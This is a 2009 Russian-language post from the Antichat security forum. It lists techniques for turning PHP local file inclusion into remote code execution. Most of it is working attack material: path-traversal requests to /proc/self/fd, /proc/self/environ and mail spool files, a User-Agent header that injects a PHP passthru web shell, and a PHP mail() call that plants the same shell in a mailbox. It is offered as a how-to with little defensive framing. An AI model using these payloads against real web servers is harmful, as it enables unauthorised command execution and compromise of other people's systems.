ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #13  
Старый 29.01.2009, 21:14
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

1) юзаем логи, не зная к ним пути

a. /proc/%{PID}/fd/%{FD_ID}

%{PID} - пид
%{FD_ID} - ярлыки, (1,2,3,..,9) 2 и 7 логи апача (не факт что всегда, у меня были тоже 2 и 7)

/proc/self/status - смотрим пид
/proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2

index.php?inc=../../../../../proc/3661/fd/2
User-Agent: <?php passthru($_GET['cmd']) ?>

Код:
dr-x------ 2 www-data www-data  0 Jan  2 18:27 .
dr-xr-xr-x 6 www-data www-data  0 Jan  2 18:27 ..
lr-x------ 1 www-data www-data 64 Jan  2 18:27 0 -> /dev/null
l-wx------ 1 www-data www-data 64 Jan  2 18:27 1 -> pipe:[3113414]
l-wx------ 1 www-data www-data 64 Jan  2 18:27 2 -> /var/log/apache2/error.log
lrwx------ 1 www-data www-data 64 Jan  2 18:27 3 -> socket:[2714910]
lr-x------ 1 www-data www-data 64 Jan  2 18:27 4 -> pipe:[2714921]
l-wx------ 1 www-data www-data 64 Jan  2 18:27 5 -> pipe:[2714921]
l-wx------ 1 www-data www-data 64 Jan  2 18:27 6 -> /var/log/apache2/access.log
lrwx------ 1 www-data www-data 64 Jan  2 18:27 7 -> /anon_inode:[eventpoll]
lrwx------ 1 www-data www-data 64 Jan  2 18:27 8 -> socket:[2742717]
lr-x------ 1 www-data www-data 64 Jan  2 18:27 9 -> /proc/27262/fd
b. напрямую
index.php?inc=../../../../../proc/self/fd/2
User-Agent: <?php passthru($_GET['cmd']) ?>

2) переменные окружения (если неправильно понял - поправьте)
index.php?inc=../../../../../proc/self/environ
POST:
User-Agent: <?php passthru($_GET['cmd']) ?>

3) mail
PHP код:
<? 
mail
("ololo@localhost""<?php passthru(\$_GET['cmd']) ?>""fuckme");
?>
index.php?inc=../../../../../var/mail/ololo
index.php?inc=../../../../../var/spool/mail/ololo


зы.
/proc/version
/proc/self/cmdline
/proc/devices


по мотивам
Код:
http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
http://www.milw0rm.com/papers/260
http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx
__________________
ПИУ-ПИУ...
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Cracking Unix password files for beginners bxN5 Forum for discussion of ANTICHAT 2 03.04.2007 23:45
Вопрос по Mysql {BuT@Min} PHP, PERL, MySQL, JavaScript 4 18.12.2006 08:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ